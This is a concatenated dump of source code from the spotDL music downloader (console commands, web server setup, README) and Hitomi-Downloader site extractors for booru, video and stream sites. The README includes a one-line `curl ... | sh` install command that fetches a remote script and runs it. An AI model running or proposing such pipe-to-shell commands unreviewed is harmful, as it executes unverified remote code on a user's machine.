CORSMiddleware from uvicorn import Config, Server from spotdl._version import __version__ from spotdl.types.options import DownloaderOptions, WebOptions from spotdl.utils.config import get_web_ui_path from spotdl.utils.github import download_github_dir from spotdl.utils.logging import NAME_TO_LEVEL from spotdl.utils.web import ( ALLOWED_ORIGINS, SPAStaticFiles, app_state, fix_mime_types, get_current_state, router, ) __all__ = ["web"] logger = logging.getLogger(__name__) def web(web_settings: WebOptions, downloader_settings: DownloaderOptions): """ Run the web server. ### Arguments - web_settings: Web server settings. 
- downloader_settings: Downloader settings. """ # Apply the fix for mime types fix_mime_types() # Set up the app loggers uvicorn_logger = logging.getLogger("uvicorn") uvicorn_logger.propagate = False spotipy_logger = logging.getLogger("spotipy") spotipy_logger.setLevel(logging.NOTSET) # Initialize the web server settings app_state.web_settings = web_settings app_state.logger = uvicorn_logger # Create the event loop app_state.loop = ( asyncio.new_event_loop() if sys.platform != "win32" else asyncio.ProactorEventLoop() # type: ignore ) downloader_settings["simple_tui"] = True # Download web app from GitHub if not already downloaded or force flag set web_app_dir = get_web_ui_path() dist_dir = web_app_dir / "dist" if (not dist_dir.exists() or web_settings["force_update_gui"]) and web_settings[ "web_gui_location" ] is None: if web_settings["web_gui_repo"] is None: gui_repo = "https://github.com/spotdl/web-ui/tree/master/dist" else: gui_repo = web_settings["web_gui_repo"] logger.info("Updating web app from %s", gui_repo) download_github_dir( gui_repo, output_dir=str(web_app_dir), ) web_app_dir = Path(os.path.join(web_app_dir, "dist")).resolve() elif web_settings["web_gui_location"]: web_app_dir = Path(web_settings["web_gui_location"]).resolve() logger.info("Using custom web app location: %s", web_app_dir) else: logger.info( "Using cached web app. To update use the `--force-update-gui` flag." ) web_app_dir = Path(os.path.join(web_app_dir, "dist")).resolve() app_state.api = FastAPI( title="spotDL", description="Download music from Spotify", version=__version__, dependencies=[Depends(get_current_state)], ) app_state.api.include_router(router) # Add the CORS middleware app_state.api.add_middleware( CORSMiddleware, allow_origins=( ALLOWED_ORIGINS + web_settings["allowed_origins"] if web_settings["allowed_origins"] else ALLOWED_ORIGINS ), allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) # Add the static files app_state.api.mount( "/", SPAStaticFiles(directory=web_app_dir, html=True), name="static", ) protocol = "http" config = Config( app=app_state.api, host=web_settings["host"], port=web_settings["port"], workers=1, log_level=NAME_TO_LEVEL[downloader_settings["log_level"]], loop=app_state.loop, # type: ignore ) if web_settings["enable_tls"]: logger.info("Enabeling TLS") protocol = "https" config.ssl_certfile = web_settings["cert_file"] config.ssl_keyfile = web_settings["key_file"] config.ssl_ca_certs = web_settings["ca_file"] app_state.server = Server(config) app_state.downloader_settings = downloader_settings # Open the web browser webbrowser.open(f"{protocol}://{web_settings['host']}:{web_settings['port']}/") if not web_settings["web_use_output_dir"]: logger.info( "Files are stored in temporary directory " "and will be deleted after the program exits " "to save them to current directory permanently " "enable the `web_use_output_dir` option " ) else: logger.info( "Files are stored in current directory " "to save them to temporary directory " "disable the `web_use_output_dir` option " ) logger.info("Starting web server \n") # Start the web server app_state.loop.run_until_complete(app_state.server.serve()) File: spotdl/console/download.py """ Download module for the console. """ from typing import List from spotdl.download.downloader import Downloader from spotdl.utils.search import get_simple_songs __all__ = ["download"] def download( query: List[str], downloader: Downloader, ) -> None: """ Find songs with the provided audio provider and save them to the disk. 
### Arguments - query: list of strings to search for. """ # Parse the query songs = get_simple_songs( query, use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], albums_to_ignore=downloader.settings["ignore_albums"], album_type=downloader.settings["album_type"], ) # Download the songs downloader.download_multiple_songs(songs) File: spotdl/console/entry_point.py """ Module that holds the entry point for the console. """ import cProfile import logging import pstats import signal import sys import time from spotdl.console.download import download from spotdl.console.meta import meta from spotdl.console.save import save from spotdl.console.sync import sync from spotdl.console.url import url from spotdl.console.web import web from spotdl.download.downloader import Downloader, DownloaderError from spotdl.utils.arguments import parse_arguments from spotdl.utils.config import create_settings from spotdl.utils.console import ACTIONS, generate_initial_config, is_executable from spotdl.utils.downloader import check_ytmusic_connection from spotdl.utils.ffmpeg import FFmpegError, download_ffmpeg, is_ffmpeg_installed from spotdl.utils.logging import init_logging from spotdl.utils.spotify import SpotifyClient, SpotifyError, save_spotify_cache __all__ = ["console_entry_point", "OPERATIONS"] OPERATIONS = { "download": download, "sync": sync, "save": save, "meta": meta, "url": url, } logger = logging.getLogger(__name__) def console_entry_point(): """ Entry point for the console. With profile flag, it runs the code with cProfile. """ if "--profile" in sys.argv: with cProfile.Profile() as profile: entry_point() stats = pstats.Stats(profile) stats.sort_stats(pstats.SortKey.TIME) stats.dump_stats("spotdl.profile") else: entry_point() def entry_point(): """ Console entry point for spotdl. This is where the magic happens. """ # Create config file if it doesn't exist generate_initial_config() # Check if sys.argv contains an action # If it does, we run the action and exit try: action_to_run = next( action for action_name, action in ACTIONS.items() if action_name in sys.argv ) except StopIteration: action_to_run = None if action_to_run: action_to_run() return None # Parse the arguments arguments = parse_arguments() # Create settings dicts spotify_settings, downloader_settings, web_settings = create_settings(arguments) init_logging(downloader_settings["log_level"], downloader_settings["log_format"]) # If the application is frozen, we check for ffmpeg # if it's not present download it create config file if is_executable(): if is_ffmpeg_installed() is False: download_ffmpeg() # Check if ffmpeg is installed if is_ffmpeg_installed(downloader_settings["ffmpeg"]) is False: raise FFmpegError( "FFmpeg is not installed. Please run `spotdl --download-ffmpeg` to install it, " "or `spotdl --ffmpeg /path/to/ffmpeg` to specify the path to ffmpeg." ) # Check if we are not blocked by ytm if "youtube-music" in downloader_settings["audio_providers"]: if not check_ytmusic_connection(): raise DownloaderError( "You are blocked by YouTube Music. 
" "Please use a VPN, change youtube-music to piped, or use other audio providers" ) # Initialize spotify client SpotifyClient.init(**spotify_settings) spotify_client = SpotifyClient() # If the application is frozen start web ui # or if the operation is `web` if is_executable() or arguments.operation == "web": # Default to the current directory when running a frozen application if is_executable(): web_settings["web_use_output_dir"] = True # Start web ui web(web_settings, downloader_settings) return None # Check if save file is present and if it's valid if isinstance(downloader_settings["save_file"], str) and ( not downloader_settings["save_file"].endswith(".spotdl") and not downloader_settings["save_file"] == "-" ): raise DownloaderError("Save file has to end with .spotdl") # Check if the user is logged in if ( arguments.query and "saved" in arguments.query and not spotify_settings["user_auth"] ): raise SpotifyError( "You must be logged in to use the saved query. " "Log in by adding the --user-auth flag" ) # Initialize the downloader # for download, load and preload operations downloader = Downloader(downloader_settings) def graceful_exit(_signal, _frame): if spotify_settings["use_cache_file"]: save_spotify_cache(spotify_client.cache) downloader.progress_handler.close() sys.exit(0) signal.signal(signal.SIGINT, graceful_exit) signal.signal(signal.SIGTERM, graceful_exit) start_time = time.perf_counter() try: # Pick the operation to perform # based on the name and run it! OPERATIONS[arguments.operation]( query=arguments.query, downloader=downloader, ) except Exception as exc: if downloader_settings["save_errors"]: with open( downloader_settings["save_errors"], "a", encoding="utf-8" ) as error_file: error_file.write("\n".join([exc + "\n" for exc in exc.args])) logger.debug("Saved errors to %s", downloader_settings["save_errors"]) end_time = time.perf_counter() logger.debug("Took %d seconds", end_time - start_time) downloader.progress_handler.close() logger.exception("An error occurred") sys.exit(1) end_time = time.perf_counter() logger.debug("Took %d seconds", end_time - start_time) if spotify_settings["use_cache_file"]: save_spotify_cache(spotify_client.cache) downloader.progress_handler.close() return None File: spotdl/console/__init__.py """ Console module, contains the console entry point and different subcommands. """ from spotdl.console.entry_point import console_entry_point __all__ = [ "console_entry_point", ] File: spotdl/console/url.py """ Url module for the console. """ import asyncio import logging from typing import List from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.search import parse_query __all__ = ["url"] logger = logging.getLogger(__name__) def url( query: List[str], downloader: Downloader, ) -> None: """ Print download url for the provided songs. ### Arguments - query: list of strings to search for. 
""" # Parse the query songs = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) def process_song(song: Song): try: data = downloader.search(song) if data is None: logger.error("Could not find a match for %s", song.display_name) return None audio_provider = downloader.audio_providers[0] download_url = audio_provider.get_download_metadata(data)["url"] print(download_url) except Exception as exception: logger.error("%s generated an exception: %s", song.display_name, exception) return None async def pool_worker(song: Song): async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. return await downloader.loop.run_in_executor(None, process_song, song) tasks = [pool_worker(song) for song in songs] downloader.loop.run_until_complete(asyncio.gather(*tasks)) File: spotdl/console/meta.py """ Sync Lyrics module for the console """ import asyncio import logging from pathlib import Path from typing import List from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.ffmpeg import FFMPEG_FORMATS from spotdl.utils.lrc import generate_lrc from spotdl.utils.metadata import embed_metadata, get_file_metadata from spotdl.utils.search import QueryError, get_search_results, parse_query, reinit_song __all__ = ["meta"] logger = logging.getLogger(__name__) def meta(query: List[str], downloader: Downloader) -> None: """ This function applies metadata to the selected songs based on the file name. If song already has metadata, missing metadata is added ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. ### Notes - This function is multi-threaded. """ # Create a list of all songs from all paths in query paths: List[Path] = [] for path in query: test_path = Path(path) if not test_path.exists(): logger.error("Path does not exist: %s", path) continue if test_path.is_dir(): for out_format in FFMPEG_FORMATS: paths.extend(test_path.glob(f"*.{out_format}")) elif test_path.is_file(): if test_path.suffix.split(".")[-1] not in FFMPEG_FORMATS: logger.error("File is not a supported audio format: %s", path) continue paths.append(test_path) def process_file(file: Path): # metadata of the file, url is present in the file. 
song_meta = get_file_metadata(file, downloader.settings["id3_separator"]) # Check if song has metadata # and if it has all the required fields # if it has all of these fields, we can assume that the metadata is correct if song_meta and not downloader.settings["force_update_metadata"]: if ( song_meta.get("artist") and song_meta.get("artists") and song_meta.get("name") and song_meta.get("lyrics") and song_meta.get("album_art") ): logger.info("Song already has metadata: %s", file.name) if downloader.settings["generate_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.info("Lrc file already exists for %s", file.name) return None song = Song.from_missing_data( name=song_meta["name"], artists=song_meta["artists"], artist=song_meta["artist"], ) generate_lrc(song, file) if lrc_file.exists(): logger.info("Saved lrc file for %s", song.display_name) else: logger.info("Could not find lrc file for %s", song.display_name) return None # Same as above if ( not song_meta or None in [ song_meta.get("name"), song_meta.get("album_art"), song_meta.get("artist"), song_meta.get("artists"), song_meta.get("track_number"), ] or downloader.settings["force_update_metadata"] ): # Song does not have metadata, or it is missing some fields # or we are forcing update of metadata # so we search for it logger.debug("Searching metadata for %s", file.name) search_results = get_search_results(file.stem) if not search_results: logger.error("Could not find metadata for %s", file.name) return None song = search_results[0] else: # Song has metadata, so we use it to reinitialize the song object # and fill in the missing metadata try: song = reinit_song(Song.from_missing_data(**song_meta)) except QueryError: logger.error("Could not find metadata for %s", file.name) return None # Check if the song has lyric # if not use downloader to find lyrics if song_meta is None or song_meta.get("lyrics") is None: logger.debug("Fetching lyrics for %s", song.display_name) song.lyrics = downloader.search_lyrics(song) if song.lyrics: logger.info("Found lyrics for song: %s", song.display_name) else: song.lyrics = song_meta.get("lyrics") # Apply metadata to the song embed_metadata(file, song, skip_album_art=downloader.settings["skip_album_art"]) logger.info("Applied metadata to %s", file.name) if downloader.settings["generate_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.info("Lrc file already exists for %s", file.name) return None generate_lrc(song, file) if lrc_file.exists(): logger.info("Saved lrc file for %s", song.display_name) else: logger.info("Could not find lrc file for %s", song.display_name) return None async def pool_worker(file_path: Path) -> None: async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. 
await downloader.loop.run_in_executor(None, process_file, file_path) tasks = [pool_worker(path) for path in paths] # call all task asynchronously, and wait until all are finished downloader.loop.run_until_complete(asyncio.gather(*tasks)) # to re-download the local songs if downloader.settings["redownload"]: songs_url: List[str] = [] for file in paths: meta_data = get_file_metadata( Path(file), downloader.settings["id3_separator"] ) if meta_data and meta_data["url"]: songs_url.append(meta_data["url"]) songs_list = parse_query( query=songs_url, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) downloader.download_multiple_songs(songs_list)
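The `pool_worker` comment repeated through the console commands above (`save`, `url`, `meta`) describes one pattern: cap concurrency with the downloader's `asyncio.Semaphore` and push each blocking call into the default `ThreadPoolExecutor` via `run_in_executor`, so the event loop itself is never blocked. Below is a minimal standalone sketch of that pattern; it is not spotDL's implementation, and names such as `process_item` and `MAX_PARALLEL` are illustrative only.

```python
# Minimal, self-contained sketch of the semaphore + run_in_executor pattern.
# `process_item` and `MAX_PARALLEL` are illustrative stand-ins, not spotDL API.
import asyncio
import time
from typing import List, Optional

MAX_PARALLEL = 4  # stands in for the downloader's semaphore size


def process_item(item: str) -> Optional[str]:
    """Stand-in for a blocking call such as searching or downloading a song."""
    time.sleep(0.1)  # simulated I/O; real network/disk I/O releases the GIL
    return item.upper()


async def main(items: List[str]) -> List[Optional[str]]:
    loop = asyncio.get_running_loop()
    semaphore = asyncio.Semaphore(MAX_PARALLEL)

    async def pool_worker(item: str) -> Optional[str]:
        async with semaphore:
            # Run the blocking function in a worker thread and await its result,
            # keeping the event loop free for the other workers.
            return await loop.run_in_executor(None, process_item, item)

    return await asyncio.gather(*(pool_worker(i) for i in items))


if __name__ == "__main__":
    print(asyncio.run(main(["a", "b", "c"])))
```

Because the heavy calls are network and disk bound, the GIL is released while they run, which is why a plain thread pool is enough here and a separate process pool is not needed.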
<!--- mdformat-toc start --slug=github ---> <!--- !!! IF EDITING THE README, ENSURE TO COPY THE WHOLE FILE TO index.md in `/docs/` AND REMOVE THE REFERENCES TO ReadTheDocs THERE. ---> <div align="center"> # spotDL v4 **spotDL** finds songs from Spotify playlists on YouTube and downloads them - along with album art, lyrics and metadata. [![MIT License](https://img.shields.io/github/license/spotdl/spotify-downloader?color=44CC11&style=flat-square)](https://github.com/spotDL/spotify-downloader/blob/master/LICENSE) [![PyPI version](https://img.shields.io/pypi/pyversions/spotDL?color=%2344CC11&style=flat-square)](https://pypi.org/project/spotdl/) [![PyPi downloads](https://img.shields.io/pypi/dw/spotDL?label=downloads@pypi&color=344CC11&style=flat-square)](https://pypi.org/project/spotdl/) ![Contributors](https://img.shields.io/github/contributors/spotDL/spotify-downloader?style=flat-square) [![Discord](https://img.shields.io/discord/771628785447337985?label=discord&logo=discord&style=flat-square)](https://discord.gg/xCa23pwJWY) > spotDL: The fastest, easiest and most accurate command-line music downloader. </div> ______________________________________________________________________ **[Read the documentation on ReadTheDocs!](https://spotdl.readthedocs.io)** ______________________________________________________________________ ## Installation Refer to our [Installation Guide](https://spotdl.rtfd.io/en/latest/installation/) for more details. ### Python (Recommended Method) - _spotDL_ can be installed by running `pip install spotdl`. - To update spotDL run `pip install --upgrade spotdl` > On some systems you might have to change `pip` to `pip3`. <details> <summary style="font-size:1.25em"><strong>Other options</strong></summary> - Prebuilt executable - You can download the latest version from the [Releases Tab](https://github.com/spotDL/spotify-downloader/releases) - On Termux - `curl -L https://raw.githubusercontent.com/spotDL/spotify-downloader/master/scripts/termux.sh | sh` - Arch - There is an [Arch User Repository (AUR) package](https://aur.archlinux.org/packages/python-spotdl/) for spotDL. - Docker - Build image: ```bash docker build -t spotdl . ``` - Launch container with spotDL parameters (see section below). You need to create mapped volume to access song files ```bash docker run --rm -v $(pwd):/music spotdl download [trackUrl] ``` - Build from source ```bash git clone https://github.com/spotDL/spotify-downloader && cd spotify-downloader pip install poetry poetry install poetry run python3 scripts/build.py ``` An executable is created in `spotify-downloader/dist/`. </details> ### Installing FFmpeg FFmpeg is required for spotDL. If using FFmpeg only for spotDL, you can simply install FFmpeg to your spotDL installation directory: `spotdl --download-ffmpeg` We recommend the above option, but if you want to install FFmpeg system-wide, follow these instructions - [Windows Tutorial](https://windowsloop.com/install-ffmpeg-windows-10/) - OSX - `brew install ffmpeg` - Linux - `sudo apt install ffmpeg` or use your distro's package manager ## Usage Using SpotDL without options:: ```sh spotdl [urls] ``` You can run _spotDL_ as a package if running it as a script doesn't work: ```sh python -m spotdl [urls] ``` General usage: ```sh spotdl [operation] [options] QUERY ``` There are different **operations** spotDL can perform. The *default* is `download`, which simply downloads the songs from YouTube and embeds metadata. 
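For example, the two forms below are equivalent, since `download` is the default operation (the Spotify URL is just a placeholder):

```sh
spotdl https://open.spotify.com/track/...
spotdl download https://open.spotify.com/track/...
```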
The **query** for spotDL is usually a list of Spotify URLs, but for some operations like **sync**, only a single link or file is required. For a list of all **options** use ```spotdl -h``` <details> <summary style="font-size:1em"><strong>Supported operations</strong></summary> - `save`: Saves only the metadata from Spotify without downloading anything. - Usage: `spotdl save [query] --save-file {filename}.spotdl` - `web`: Starts a web interface instead of using the command line. However, it has limited features and only supports downloading single songs. - `url`: Get direct download link for each song from the query. - Usage: `spotdl url [query]` - `sync`: Updates directories. Compares the directory with the current state of the playlist. Newly added songs will be downloaded and removed songs will be deleted. No other songs will be downloaded and no other files will be deleted. - Usage: `spotdl sync [query] --save-file {filename}.spotdl` This create a new **sync** file, to update the directory in the future, use: `spotdl sync {filename}.spotdl` - `meta`: Updates metadata for the provided song files. </details> ## Music Sourcing and Audio Quality spotDL uses YouTube as a source for music downloads. This method is used to avoid any issues related to downloading music from Spotify. > **Note** > Users are responsible for their actions and potential legal consequences. We do not support unauthorized downloading of copyrighted material and take no responsibility for user actions. ### Audio Quality spotDL downloads music from YouTube and is designed to always download the highest possible bitrate; which is 128 kbps for regular users and 256 kbps for YouTube Music premium users. Check the [Audio Formats](docs/usage.md#audio-formats-and-quality) page for more info. ## Contributing Interested in contributing? Check out our [CONTRIBUTING.md](docs/CONTRIBUTING.md) to find resources around contributing along with a guide on how to set up a development environment. #### Join our amazing community as a code contributor, and help accelerate <br><br> <a href="https://github.com/spotDL/spotify-downloader/graphs/contributors"> <img class="dark-light" src="https://contrib.rocks/image?repo=spotDL/spotify-downloader&anon=0&columns=25&max=100&r=true" /> </a> ## Donate help support the development and maintenance of the software ❤️ [![paypal](https://img.shields.io/badge/paypal-%2300457C.svg?&style=for-the-badge&logo=paypal&logoColor=white)](https://paypal.me/kko7) [![kofi](https://img.shields.io/badge/kofi-%23F16061.svg?&style=for-the-badge&logo=ko-fi&logoColor=white)](https://ko-fi.com/xnetcat) ## License This project is Licensed under the [MIT](/LICENSE) License.
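As a concrete illustration of the `sync` operation described in the supported-operations list above (the playlist URL and file name are placeholders):

```sh
# First run: download the playlist and record its state in a sync file
spotdl sync https://open.spotify.com/playlist/... --save-file my-playlist.spotdl

# Later runs: bring the directory back in line with the playlist
spotdl sync my-playlist.spotdl
```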
Hitomi-Downloader
c6dc4c421d0e3986936ad740073c3ee52e226c1f
File: src/extractor/danbooru_downloader.py #coding: utf-8 import downloader import ree as re from utils import Downloader, get_max_range, clean_title, get_print, try_n, urljoin, check_alive, LazyUrl, get_ext, limits from translator import tr_ from urllib.parse import urlparse, parse_qs, quote import clf2 class Downloader_danbooru(Downloader): type = 'danbooru' URLS = ['danbooru.donmai.us'] MAX_CORE = 6 _name = None ACCEPT_COOKIES = [r'(.*\.)?donmai\.us'] def init(self): self.session = clf2.solve(self.url, cw=self.cw)['session'] #5336 @classmethod def fix_url(cls, url): if 'donmai.us' in url: url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = f'https://danbooru.donmai.us/posts?tags={quote(url)}' if 'donmai.us/posts/' in url: url = url.split('?')[0] return url.strip('+') @property def name(self): if self._name is None: parsed_url = urlparse(self.url) qs = parse_qs(parsed_url.query) if 'donmai.us/favorites' in self.url: id = qs.get('user_id', [''])[0] print('len(id) =', len(id), f'"{id}"') if not id: raise AssertionError('[Fav] User id is not specified') id = f'fav_{id}' elif 'donmai.us/explore/posts/popular' in self.url: #4160 soup = read_soup(self.url, self.session, self.cw) id = soup.find('h1').text elif 'donmai.us/posts/' in self.url: id = re.find(r'donmai\.us/posts/([0-9]+)', self.url, err='no id') else: tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' self._name = id return clean_title(self._name) def read(self): self.title = self.name if 'donmai.us/posts/' in self.url: self.single = True imgs = get_imgs(self.url, self.session, self.name, cw=self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name class Image: def __init__(self, id, url, session, cw): self._cw = cw self.id = id self._session = session self.url = LazyUrl(url, self.get, self) def get(self, url): soup = read_soup(url, self._session, self._cw) ori = soup.find('li', id='post-option-view-original') if ori: img = ori.find('a')['href'] else: img = soup.find('li', id='post-info-size').find('a')['href'] if get_ext(img) == '.zip': #4635 img = soup.find('section', id='content').find('video')['src'] img = urljoin(url, img) ext = get_ext(img) self.filename = f'{self.id}{ext}' return img, None @limits(.5) def wait(cw): check_alive(cw) def setPage(url, page): # Main page if re.findall(r'https://[\w]*[.]?donmai.us/?$', url): url = f"https://{'danbooru.' if 'danbooru.' 
in url else ''}donmai.us/posts?page=1" # Change the page if 'page=' in url: url = re.sub('page=[0-9]*', f'page={page}', url) else: url += f'&page={page}' return url @try_n(12) #4103 def read_soup(url, session, cw, try_=1): check_alive(cw) wait(cw) if try_ > 1: session.headers['User-Agent'] = downloader.ua.random #5730 return downloader.read_soup(url, session=session) def get_imgs(url, session, title=None, range_=None, cw=None): if 'donmai.us/artists' in url: raise NotImplementedError() if 'donmai.us/posts/' in url: id = re.find(r'donmai\.us/posts/([0-9]+)', url, err='no id') img = Image(id, url, session, cw) return [img] print_ = get_print(cw) # Range max_pid = get_max_range(cw) if range_ is None: range_ = range(1, 1001) print(range_) imgs = [] i = 0 empty_count = 0 empty_count_global = 0 url_imgs = set() while i < len(range_): check_alive(cw) p = range_[i] url = setPage(url, p) print_(url) soup = read_soup(url, session, cw) articles = soup.findAll('article') if articles: empty_count_global = 0 else: empty_count += 1 if empty_count < 4: s = f'empty page; retry... {p}' print_(s) continue else: empty_count = 0 empty_count_global += 1 if empty_count_global >= 6: break for article in articles: id = article.attrs['data-id'] #url_img = article.attrs['data-file-url'].strip() url_img = urljoin(url, article.find('a', class_='post-preview-link')['href']) #4160 #print(url_img) if url_img not in url_imgs: url_imgs.add(url_img) img = Image(id, url_img, session, cw) imgs.append(img) if len(imgs) >= max_pid: break if cw is not None: cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(imgs)}') i += 1 return imgs[:max_pid] File: src/extractor/gelbooru_downloader.py #coding: utf-8 import downloader import ree as re from utils import Downloader, urljoin, query_url, get_max_range, get_print, get_ext, clean_title, Session, check_alive, File, clean_url from translator import tr_ from urllib.parse import quote import utils def get_tags(url): url = clean_url(url) qs = query_url(url) if 'page=favorites' in url: id = qs.get('id', ['N/A'])[0] id = 'fav_{}'.format(id) else: tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' return id class Downloader_gelbooru(Downloader): type = 'gelbooru' URLS = ['gelbooru.com'] MAX_CORE = 8 _name = None ACCEPT_COOKIES = [r'(.*\.)?gelbooru\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): if 'gelbooru.com' in url.lower(): url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = quote(url) url = url.replace('%2B', '+') url = 'https://gelbooru.com/index.php?page=post&s=list&tags={}'.format(url) return url @property def name(self): if self._name is None: tags = get_tags(self.url) self._name = tags return clean_title(self._name) def read(self): self.title = self.name self.urls += get_imgs(self.url, self.session, self.name, cw=self.cw) self.title = self.name class File_gelbooru(File): type = 'gelbooru' format = 'id' def get(self): soup = downloader.read_soup(self['referer'], session=self.session) for li in soup.findAll('li'): if li.text.strip() == 'Original image': break else: raise Exception('no Original image') url = li.find('a')['href'] d = { 'id': self['id'], } return {'url': url, 'name': utils.format('gelbooru', d, get_ext(url))} def alter(self): return self.get()['url'] def setPage(url, page): if 'pid=' in url: url = re.sub('pid=[0-9]*', f'pid={page}', url) else: url += f'&pid={page}' if page == 0: url = url.replace('&pid=0', '') return url def 
get_imgs(url, session, title=None, cw=None): print_ = get_print(cw) url = clean_url(url) if 's=view' in url and 'page=favorites' not in url: raise NotImplementedError('Not Implemented') tags = get_tags(url) tags = quote(tags, safe='/') tags = tags.replace('%20', '+') url = f'https://gelbooru.com/index.php?page=post&s=list&tags={tags}' # 2566 user_id = session.cookies.get('user_id', domain='gelbooru.com') if not user_id: cookies = {'fringeBenefits': 'yup'} session.cookies.update(cookies) print_('user_id: {}'.format(user_id)) # Range max_pid = get_max_range(cw) imgs = [] ids = set() count_no_imgs = 0 for p in range(500): #1017 check_alive(cw) url = setPage(url, len(ids)) print_(url) soup = downloader.read_soup(url, session=session) posts = soup.findAll(class_='thumbnail-preview') imgs_new = [] for post in posts: id_ = int(re.find('[0-9]+', post.find('a')['id'], err='no id')) if id_ in ids: print('duplicate:', id_) continue ids.add(id_) url_img = urljoin(url, post.find('a')['href']) img = File_gelbooru({'id': id_, 'referer': url_img, 'name_hint': f'{id_}{{ext}}'}) imgs_new.append(img) if imgs_new: imgs += imgs_new count_no_imgs = 0 else: print('no imgs') count_no_imgs += 1 if count_no_imgs > 1: print('break') break if len(imgs) >= max_pid: break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) return imgs[:max_pid] File: src/extractor/youporn_downloader.py import downloader from io import BytesIO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl from m3u8_tools import M3u8_stream class Downloader_youporn(Downloader): type = 'youporn' single = True URLS = ['youporn.com'] display_name = 'YouPorn' ACCEPT_COOKIES = [r'(.*\.)?youporn\.com'] @classmethod def fix_url(cls, url): if 'youporn.com' not in url.lower(): url = 'https://www.youporn.com/watch/{}'.format(url) return url def read(self): video = Video(self.url, cw=self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: @try_n(4) def __init__(self, url, cw=None): ydl = ytdl.YoutubeDL(cw=cw) info = ydl.extract_info(url) f = info['formats'][-1] url_video = f['url'] ext = get_ext(url_video) if ext.lower() == '.m3u8': #6142 ext = '.mp4' url_video = M3u8_stream(url_video, referer=url) self.url = LazyUrl(url, lambda _: url_video, self) self.url_thumb = info['thumbnails'][0]['url'] self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) self.title = info['title'] self.filename = format_filename(self.title, info['id'], ext) File: src/extractor/m3u8_downloader.py from utils import Downloader, LazyUrl, clean_title, Session, get_ext import utils from m3u8_tools import playlist2stream, M3u8_stream import os from hashlib import md5 from translator import tr_ DEFAULT_N_THREAD = 2 def suitable(url): ext = get_ext(url).lower() return ext in ('.m3u8', '.mpd') class Downloader_m3u8(Downloader): type = 'm3u8' URLS = [suitable] single = True display_name = 'M3U8' @classmethod def fix_url(cls, url): if '://' not in url: url = 'http://' + url return url def read(self): fmt = self.cw.format referer = self.url if isinstance(fmt, str) and fmt.startswith('referer:'): referer = fmt[len('referer:'):] self.print_('referer: {}'.format(referer)) n_thread = DEFAULT_N_THREAD if isinstance(fmt, int) and fmt > 0: n_thread = fmt self.print_('n_thread: {}'.format(n_thread)) video = Video(self.url, n_thread, referer) self.urls.append(video.url) self.title = 
os.path.splitext(os.path.basename(video.filename))[0].replace(b'\xef\xbc\x9a'.decode('utf8'), ':') class Video: def __init__(self, url, n_thread, referer): session = Session() session.purge([rf'(.*\.)?{utils.domain(url)}']) if get_ext(url).lower() == '.mpd': def m(): hdr = session.headers.copy() if referer: hdr['Referer'] = referer return utils.LiveStream(url, headers=hdr) ms = [m] else: ms = [ lambda: playlist2stream(url, n_thread=n_thread, session=session), lambda: M3u8_stream(url, n_thread=n_thread, session=session), ] for m in ms: try: m = m() break except Exception as e: e_ = e else: raise e_ if getattr(m, 'live', None) is not None: #5110 #m = m.live hdr = session.headers.copy() if referer: hdr['Referer'] = referer m = utils.LiveStream(url, headers=hdr) live = True else: live = False self.url = LazyUrl(url, lambda _: m, self) self.title = os.path.splitext(os.path.basename(url).split('?')[0])[0][:50] self.id_ = md5(url.encode('utf8')).hexdigest()[:8] tail = f' ({self.id_}).mp4' if live: #5110 from datetime import datetime tail = ' ' + clean_title(datetime.now().strftime('%Y-%m-%d %H:%M')) + tail self.filename = clean_title(self.title, n=-len(tail)) + tail import selector @selector.options('m3u8') def options(urls): def f(urls): n_thread, ok = utils.QInputDialog.getInt(Downloader.mainWindow, tr_('Set number of threads'), tr_('Number of threads?'), value=DEFAULT_N_THREAD, min=1, max=4, step=1) if not ok: return return n_thread def f2(urls): referer, ok = utils.QInputDialog.getText(Downloader.mainWindow, tr_('Set a referer'), tr_('Referer?')) if not ok: return return 'referer:'+referer return [ {'text': 'Set the number of threads...', 'format': f}, {'text': 'Set the referer...', 'format': f2}, ] File: src/extractor/afreeca_downloader.py import downloader from utils import Soup, Downloader, Session, try_n, format_filename, cut_pair, File, get_print, print_error, json import ree as re from io import BytesIO from m3u8_tools import playlist2stream, M3u8_stream import errors import utils import os class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://login.afreecatv.com/afreeca/login.php') class Downloader_afreeca(Downloader): type = 'afreeca' URLS = ['afreecatv.com'] single = True display_name = 'AfreecaTV' ACCEPT_COOKIES = [r'(.*\.)?afreecatv\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): if Live_afreeca.is_live(url): url = Live_afreeca.fix_url(url) return url.rstrip(' /') def read(self): video = Video({'referer': self.url}) 